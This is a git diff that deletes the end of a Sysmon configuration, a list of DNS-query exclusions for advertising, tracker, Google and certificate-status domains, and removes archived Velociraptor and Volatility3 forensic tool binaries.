-			<QueryName condition="end with">.typekit.net</QueryName> <!--Adobe fonts-->
-			<QueryName condition="is">cdnjs.cloudflare.com</QueryName>
-			<QueryName condition="end with">.stackassets.com</QueryName> <!--Stack Overflow-->
-			<QueryName condition="end with">.steamcontent.com</QueryName>
-			<!--Web resources-->
-			<QueryName condition="end with">.disqus.com</QueryName> <!--Microsoft default exclusion-->
-			<QueryName condition="end with">.fontawesome.com</QueryName>
-			<QueryName condition="is">disqus.com</QueryName> <!--Microsoft default exclusion-->
-			<!--Ads-->
-			<QueryName condition="end with">.1rx.io</QueryName> <!--Ads-->
-			<QueryName condition="end with">.2mdn.net</QueryName> <!--Ads: Google | Microsoft default exclusion-->
-			<QueryName condition="end with">.adadvisor.net</QueryName> <!--Ads: Neustar [ https://better.fyi/trackers/adadvisor.net/ ] -->
-			<QueryName condition="end with">.adap.tv</QueryName> <!--Ads:AOL | Microsoft default exclusion [ https://www.crunchbase.com/organization/adap-tv ] -->
-			<QueryName condition="end with">.addthis.com</QueryName> <!--Ads:Oracle | Microsoft default exclusion [ https://en.wikipedia.org/wiki/AddThis ] -->
-			<QueryName condition="end with">.adform.net</QueryName> <!--Ads-->
-			<QueryName condition="end with">.adnxs.com</QueryName> <!--Ads: AppNexus | Microsoft default exclusion-->
-			<QueryName condition="end with">.adroll.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.adrta.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.adsafeprotected.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.adsrvr.org</QueryName> <!--Ads-->
-			<QueryName condition="end with">.advertising.com</QueryName> <!--Ads | Microsoft default exclusion-->
-			<QueryName condition="end with">.amazon-adsystem.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.amazon-adsystem.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.analytics.yahoo.com</QueryName> <!--Ads:Yahoo-->
-			<QueryName condition="end with">.aol.com</QueryName> <!--Ads | Microsoft default exclusion -->
-			<QueryName condition="end with">.betrad.com</QueryName> <!--Ads | Microsoft default exclusion-->
-			<QueryName condition="end with">.bidswitch.net</QueryName> <!--Ads-->
-			<QueryName condition="end with">.casalemedia.com</QueryName> <!--Ads | Microsoft default exclusion-->
-			<QueryName condition="end with">.chartbeat.net</QueryName> <!--Ads | Microsoft default exclusion [ https://better.fyi/trackers/chartbeat.com/ ]-->
-			<QueryName condition="end with">.cnn.com</QueryName> <!-- Microsoft default exclusion-->
-			<QueryName condition="end with">.convertro.com</QueryName> <!--Ads:Verizon-->
-			<QueryName condition="end with">.criteo.com</QueryName> <!--Ads [ https://better.fyi/trackers/criteo.com/ ] -->
-			<QueryName condition="end with">.criteo.net</QueryName> <!--Ads [ https://better.fyi/trackers/criteo.com/ ] -->
-			<QueryName condition="end with">.crwdcntrl.net</QueryName> <!--Ads: Lotame [ https://better.fyi/trackers/crwdcntrl.net/ ] -->
-			<QueryName condition="end with">.demdex.net</QueryName> <!--Ads | Microsoft default exclusion-->
-			<QueryName condition="end with">.domdex.com</QueryName> 
-			<QueryName condition="end with">.dotomi.com</QueryName> <!--Ads | Microsoft default exclusion-->
-			<QueryName condition="end with">.doubleclick.net</QueryName> <!--Ads:Conversant | Microsoft default exclusion [ https://www.crunchbase.com/organization/dotomi ] -->
-			<QueryName condition="end with">.doubleverify.com</QueryName> <!--Ads: Google-->
-			<QueryName condition="end with">.emxdgt.com</QueryName> <!--Ads: EMX-->
-			<QueryName condition="end with">.exelator.com</QueryName> <!--Ads:Nielson Marketing Cloud-->
-			<QueryName condition="end with">.google-analytics.com</QueryName> <!--Ads:Google | Microsoft default exclusion-->
-			<QueryName condition="end with">.googleadservices.com</QueryName> <!--Google-->
-			<QueryName condition="end with">.googlesyndication.com</QueryName> <!--Ads:Google, sometimes called during malicious ads, but not directly responsible | Microsoft default exclusion [ https://www.hackread.com/wp-content/uploads/2018/06/Bitdefender-Whitepaper-Zacinlo.pdf ]-->
-			<QueryName condition="end with">.googletagmanager.com</QueryName> <!--Google-->
-			<QueryName condition="end with">.googlevideo.com</QueryName> <!--Google | Microsoft default exclusion-->
-			<QueryName condition="end with">.gstatic.com</QueryName> <!--Google | Microsoft default exclusion-->
-			<QueryName condition="end with">.gvt1.com</QueryName> <!--Google-->
-			<QueryName condition="end with">.gvt2.com</QueryName> <!--Google-->
-			<QueryName condition="end with">.ib-ibi.com</QueryName> <!--Ads: Offerpath [ https://better.fyi/trackers/ib-ibi.com/ ] -->
-			<QueryName condition="end with">.jivox.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.mathtag.com</QueryName> <!--Microsoft default exclusion-->
-			<QueryName condition="end with">.moatads.com</QueryName> <!--Ads | Microsoft default exclusion-->
-			<QueryName condition="end with">.moatpixel.com</QueryName> <!--Ads | Microsoft default exclusion-->
-			<QueryName condition="end with">.mookie1.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.myvisualiq.net</QueryName> <!--Ads-->
-			<QueryName condition="end with">.netmng.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.nexac.com</QueryName> <!--Ads | Microsoft default exclusion-->
-			<QueryName condition="end with">.openx.net</QueryName> <!--Ads-->
-			<QueryName condition="end with">.optimizely.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.outbrain.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.pardot.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.phx.gbl</QueryName> <!--Ads | Microsoft default exclusion-->
-			<QueryName condition="end with">.pinterest.com</QueryName> <!--Pinerest-->
-			<QueryName condition="end with">.pubmatic.com</QueryName> <!--Ads | Microsoft default exclusion-->
-			<QueryName condition="end with">.quantcount.com</QueryName>
-			<QueryName condition="end with">.quantserve.com</QueryName>
-			<QueryName condition="end with">.revsci.net</QueryName> <!--Ads:Omniture | Microsoft default exclusion-->
-			<QueryName condition="end with">.rfihub.net</QueryName> <!--Ads | Microsoft default exclusion-->
-			<QueryName condition="end with">.rlcdn.com</QueryName> <!--Ads: Rapleaf [ https://better.fyi/trackers/rlcdn.com/ ] -->
-			<QueryName condition="end with">.rubiconproject.com</QueryName> <!--Ads: Rubicon Project | Microsoft default exclusion [ https://better.fyi/trackers/rubiconproject.com/ ] -->
-			<QueryName condition="end with">.scdn.co</QueryName> <!--Spotify-->
-			<QueryName condition="end with">.scorecardresearch.com</QueryName> <!--Ads: Comscore | Microsoft default exclusion-->
-			<QueryName condition="end with">.serving-sys.com</QueryName> <!--Ads | Microsoft default exclusion-->
-			<QueryName condition="end with">.sharethrough.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.simpli.fi</QueryName>
-			<QueryName condition="end with">.sitescout.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.smartadserver.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.snapads.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.spotxchange.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.taboola.com</QueryName> <!--Ads:Taboola-->
-			<QueryName condition="end with">.taboola.map.fastly.net</QueryName> <!--Ads:Taboola-->
-			<QueryName condition="end with">.tapad.com</QueryName>
-			<QueryName condition="end with">.tidaltv.com</QueryName> <!--Ads: Videology [ https://better.fyi/trackers/tidaltv.com/ ] -->
-			<QueryName condition="end with">.trafficmanager.net</QueryName> <!--Ads | Microsoft default exclusion-->
-			<QueryName condition="end with">.tremorhub.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.tribalfusion.com</QueryName> <!--Ads: Exponential [ https://better.fyi/trackers/tribalfusion.com/ ] -->
-			<QueryName condition="end with">.turn.com</QueryName> <!--Ads | Microsoft default exclusion [ https://better.fyi/trackers/turn.com/ ] -->
-			<QueryName condition="end with">.twimg.com</QueryName> <!--Ads | Microsoft default exclusion-->
-			<QueryName condition="end with">.tynt.com</QueryName> <!--Ads-->
-			<QueryName condition="end with">.w55c.net</QueryName> <!--Ads:dataxu-->
-			<QueryName condition="end with">.ytimg.com</QueryName> <!--Google-->
-			<QueryName condition="end with">.zorosrv.com</QueryName> <!--Ads:Taboola-->
-			<QueryName condition="is">1rx.io</QueryName> <!--Ads-->
-			<QueryName condition="is">adservice.google.com</QueryName> <!--Google-->
-			<QueryName condition="is">ampcid.google.com</QueryName> <!--Google-->
-			<QueryName condition="is">clientservices.googleapis.com</QueryName> <!--Google-->
-			<QueryName condition="is">googleadapis.l.google.com</QueryName> <!--Google-->
-			<QueryName condition="is">imasdk.googleapis.com</QueryName> <!--Google [ https://developers.google.com/interactive-media-ads/docs/sdks/html5/ ] -->
-			<QueryName condition="is">l.google.com</QueryName> <!--Google-->
-			<QueryName condition="is">ml314.com</QueryName> <!--Ads-->
-			<QueryName condition="is">mtalk.google.com</QueryName> <!--Google-->
-			<QueryName condition="is">update.googleapis.com</QueryName> <!--Google-->
-			<QueryName condition="is">www.googletagservices.com</QueryName> <!--Google-->
-			<!--SocialNet-->
-			<QueryName condition="end with">.pscp.tv</QueryName> <!--Twitter:Periscope-->
-			<!--OSCP/CRL Common-->
-			<QueryName condition="end with">.digicert.com</QueryName>
-			<QueryName condition="end with">.globalsign.com</QueryName>
-			<QueryName condition="end with">.globalsign.net</QueryName>
-			<QueryName condition="is">msocsp.com</QueryName> <!--Microsoft:OCSP-->
-			<QueryName condition="is">ocsp.msocsp.com</QueryName> <!--Microsoft:OCSP-->
-			<QueryName condition="end with">pki.goog</QueryName>
-			<QueryName condition="is">ocsp.godaddy.com</QueryName>
-			<QueryName condition="end with">amazontrust.com</QueryName>
-			<QueryName condition="is">ocsp.sectigo.com</QueryName>
-			<QueryName condition="is">pki-goog.l.google.com</QueryName>
-			<QueryName condition="end with">.usertrust.com</QueryName>
-			<QueryName condition="is">ocsp.comodoca.com</QueryName>
-			<QueryName condition="is">ocsp.verisign.com</QueryName>
-			<QueryName condition="is">ocsp.entrust.net</QueryName>
-			<QueryName condition="end with">ocsp.identrust.com</QueryName>
-			<QueryName condition="is">status.rapidssl.com</QueryName>
-			<QueryName condition="is">status.thawte.com</QueryName>
-			<QueryName condition="is">ocsp.int-x3.letsencrypt.org</QueryName>
-		</DnsQuery>
-	</RuleGroup>
-
-	<!--SYSMON EVENT ID 255 : ERROR-->
-		<!--"This event is generated when an error occurred within Sysmon. They can happen if the system is under heavy load
-			and certain tasked could not be performed or a bug exists in the Sysmon service. You can report any bugs on the
-			Sysinternals forum or over Twitter (@markrussinovich)."-->
-		<!--Cannot be filtered.-->
-
-	</EventFiltering>
-</Sysmon>
diff --git a/velociraptor-v0.5.5-1-windows-amd64.exe.7z b/velociraptor-v0.5.5-1-windows-amd64.exe.7z
deleted file mode 100644
index 61e0a809..00000000
Binary files a/velociraptor-v0.5.5-1-windows-amd64.exe.7z and /dev/null differ
diff --git a/velociraptor-v0.5.5-1-windows-amd64.msi b/velociraptor-v0.5.5-1-windows-amd64.msi
deleted file mode 100644
index 362d62d3..00000000
Binary files a/velociraptor-v0.5.5-1-windows-amd64.msi and /dev/null differ
diff --git a/volatility3-1.0.0.tar.gz b/volatility3-1.0.0.tar.gz
deleted file mode 100644
index 04250b78..00000000
Binary files a/volatility3-1.0.0.tar.gz and /dev/null differ